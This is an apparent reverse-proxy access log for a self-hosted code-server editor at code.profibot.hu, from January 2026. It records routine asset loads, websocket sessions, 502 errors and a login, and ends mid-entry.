"/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fapp%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fphp%2Fsnippets%2Fphp.code-snippets&tkn=" [Client 84.1.26.27] [Length 2095] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[22/Jan/2026:11:17:58 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fapp%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fswift%2Fsnippets%2Fswift.code-snippets&tkn=" [Client 84.1.26.27] [Length 581] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[22/Jan/2026:11:17:58 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fapp%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Ftypescript-basics%2Fsnippets%2Ftypescript.code-snippets&tkn=" [Client 84.1.26.27] [Length 1332] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[22/Jan/2026:11:17:58 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/vscode-remote-resource?path=%2Fapp%2Fcode-server%2Flib%2Fvscode%2Fextensions%2Fvb%2Fsnippets%2Fvb.code-snippets&tkn=" [Client 84.1.26.27] [Length 475] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[22/Jan/2026:11:42:46 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/@xterm/xterm/lib/xterm.js" [Client 84.1.26.27] [Length 127834] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[22/Jan/2026:11:42:47 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/@xterm/addon-unicode11/lib/addon-unicode11.js" [Client 84.1.26.27] [Length 16968] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[22/Jan/2026:11:42:47 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/@xterm/addon-clipboard/lib/addon-clipboard.js" [Client 84.1.26.27] [Length 2502] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[22/Jan/2026:11:42:47 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/@xterm/addon-progress/lib/addon-progress.js" [Client 84.1.26.27] [Length 694] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[22/Jan/2026:11:42:47 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/@xterm/addon-webgl/lib/addon-webgl.js" [Client 84.1.26.27] [Length 111894] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[22/Jan/2026:11:42:47 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/@xterm/addon-serialize/lib/addon-serialize.js" [Client 84.1.26.27] [Length 5654] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[22/Jan/2026:11:43:12 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/contrib/output/common/outputLinkComputerMain.js" [Client 84.1.26.27] [Length 47352] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[22/Jan/2026:12:02:00 +0000] - 404 404 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/@xterm/addon-ligatures/lib/addon-ligatures.js" [Client 84.1.26.27] [Length 23] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[22/Jan/2026:12:38:37 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 84.1.26.27] [Length 58] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[22/Jan/2026:12:38:37 +0000] - 200 200 - GET https code.profibot.hu "/?folder=/home/coder/project" [Client 84.1.26.27] [Length 1380] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[22/Jan/2026:12:38:38 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 84.1.26.27] [Length 291] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[22/Jan/2026:12:38:38 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/favicon.ico" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[22/Jan/2026:12:38:38 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-192.png" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[22/Jan/2026:12:38:38 +0000] - 404 404 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/vsda/rust/web/vsda_bg.wasm" [Client 84.1.26.27] [Length 23] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[22/Jan/2026:12:38:38 +0000] - 404 404 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/vsda/rust/web/vsda.js" [Client 84.1.26.27] [Length 23] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[22/Jan/2026:12:38:39 +0000] - 200 200 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/out/vs/workbench/services/extensions/worker/webWorkerExtensionHostIframe.html?&vscodeWebWorkerExtHostId=8001893c-4aeb-4aaf-820f-e885d7df3917" [Client 84.1.26.27] [Length 2196] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[22/Jan/2026:12:38:39 +0000] - 200 200 - GET https code.profibot.hu "/update/check" [Client 84.1.26.27] [Length 80] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder/project" +[22/Jan/2026:12:38:41 +0000] - 304 304 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[22/Jan/2026:12:38:44 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=7cd32c3d-6858-4b29-a64b-f7e9dd39fb82&reconnection=false&skipWebSocketFrames=false" [Client 84.1.26.27] [Length 826800] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[22/Jan/2026:12:38:44 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=2358951f-32f8-44dd-abbd-c70569f82f3b&reconnection=false&skipWebSocketFrames=false" [Client 84.1.26.27] [Length 11301] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[22/Jan/2026:13:29:52 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=a6ac9c9e-b578-4eb3-a428-037733d4e8ca&reconnection=false&skipWebSocketFrames=false" [Client 84.1.26.27] [Length 1064092] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[22/Jan/2026:13:29:52 +0000] - 101 101 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64?reconnectionToken=eef52a31-d39e-4708-8fff-353a520e01e0&reconnection=false&skipWebSocketFrames=false" [Client 84.1.26.27] [Length 187664] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[22/Jan/2026:22:54:21 +0000] - - 502 - GET https code.profibot.hu "/" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:22:54:21 +0000] - - 502 - GET https code.profibot.hu "/favicon.ico" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/" +[22/Jan/2026:22:54:23 +0000] - - 502 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[22/Jan/2026:22:54:26 +0000] - - 502 - GET https code.profibot.hu "/" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:22:54:27 +0000] - - 502 - GET https code.profibot.hu "/favicon.ico" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/" +[22/Jan/2026:22:54:28 +0000] - - 502 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[22/Jan/2026:22:54:59 +0000] - - 502 - GET https code.profibot.hu "/" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:22:54:59 +0000] - - 502 - GET https code.profibot.hu "/favicon.ico" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/" +[22/Jan/2026:22:55:00 +0000] - - 502 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[22/Jan/2026:22:55:30 +0000] - - 502 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[22/Jan/2026:23:01:39 +0000] - 502 502 - GET https code.profibot.hu "/" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:23:01:39 +0000] - 502 502 - GET https code.profibot.hu "/favicon.ico" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/" +[22/Jan/2026:23:01:41 +0000] - 502 502 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[22/Jan/2026:23:01:42 +0000] - 502 502 - GET https code.profibot.hu "/" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:23:01:42 +0000] - 502 502 - GET https code.profibot.hu "/favicon.ico" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/" +[22/Jan/2026:23:01:44 +0000] - 502 502 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[22/Jan/2026:23:02:10 +0000] - 502 502 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[22/Jan/2026:23:02:21 +0000] - 502 502 - GET https code.profibot.hu "/" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:23:02:21 +0000] - 502 502 - GET https code.profibot.hu "/favicon.ico" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/" +[22/Jan/2026:23:02:22 +0000] - 502 502 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[22/Jan/2026:23:02:52 +0000] - 502 502 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[22/Jan/2026:23:03:22 +0000] - 502 502 - GET https code.profibot.hu "/" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:23:03:22 +0000] - 502 502 - GET https code.profibot.hu "/favicon.ico" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/" +[22/Jan/2026:23:03:23 +0000] - 502 502 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 37.76.47.183] [Length 556] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[22/Jan/2026:23:06:33 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 37.76.47.183] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:23:06:33 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 37.76.47.183] [Length 934] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:23:06:33 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/pages/login.css" [Client 37.76.47.183] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/login" +[22/Jan/2026:23:06:33 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/pages/global.css" [Client 37.76.47.183] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/login" +[22/Jan/2026:23:06:35 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 37.76.47.183] [Length 291] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/login" +[22/Jan/2026:23:06:35 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/favicon.ico" [Client 37.76.47.183] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/login" +[22/Jan/2026:23:06:35 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-192.png" [Client 37.76.47.183] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/login" +[22/Jan/2026:23:06:35 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-maskable-512.png" [Client 37.76.47.183] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/login" +[22/Jan/2026:23:06:36 +0000] - 200 200 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 37.76.47.183] [Length 402] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[22/Jan/2026:23:07:04 +0000] - 304 304 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 37.76.47.183] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[22/Jan/2026:23:07:36 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-maskable-512.png" [Client 37.76.47.183] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://code.profibot.hu/login" +[23/Jan/2026:05:23:35 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 34.221.21.250] [Length 29] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" "-" +[23/Jan/2026:05:23:36 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 34.221.21.250] [Length 1038] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (X11; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" "https://code.profibot.hu" +[23/Jan/2026:05:23:36 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 34.221.21.250] [Length 296] [Gzip -] [Sent-to code-server] "Mozilla/5.0" "-" +[23/Jan/2026:06:35:08 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 84.1.26.27] [Length 36] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[23/Jan/2026:06:35:08 +0000] - 200 200 - GET https code.profibot.hu "/login" [Client 84.1.26.27] [Length 934] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[23/Jan/2026:06:35:09 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/pages/global.css" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[23/Jan/2026:06:35:09 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/pages/login.css" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[23/Jan/2026:06:35:10 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 84.1.26.27] [Length 291] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[23/Jan/2026:06:35:10 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/favicon.ico" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[23/Jan/2026:06:35:10 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-192.png" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[23/Jan/2026:06:35:11 +0000] - 304 304 - GET https code.profibot.hu "/_static/out/browser/serviceWorker.js" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/_static/out/browser/serviceWorker.js" +[23/Jan/2026:06:35:12 +0000] - 302 302 - POST https code.profibot.hu "/login" [Client 84.1.26.27] [Length 31] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[23/Jan/2026:06:35:12 +0000] - 302 302 - GET https code.profibot.hu "/" [Client 84.1.26.27] [Length 50] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[23/Jan/2026:06:35:12 +0000] - 200 200 - GET https code.profibot.hu "/?folder=/home/coder" [Client 84.1.26.27] [Length 1387] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/login" +[23/Jan/2026:06:35:13 +0000] - 200 200 - GET https code.profibot.hu "/manifest.json" [Client 84.1.26.27] [Length 291] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:06:35:13 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/favicon.ico" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:06:35:13 +0000] - 304 304 - GET https code.profibot.hu "/_static/src/browser/media/pwa-icon-192.png" [Client 84.1.26.27] [Length 0] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://code.profibot.hu/?folder=/home/coder" +[23/Jan/2026:06:35:13 +0000] - 404 404 - GET https code.profibot.hu "/stable-ba588b47099b31ad9734ef05534e9813bae22c64/static/node_modules/vsda/rust/web/vsda_bg.wasm" [Client 84.1.26.27] [Length 23] [Gzip -] [Sent-to code-server] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 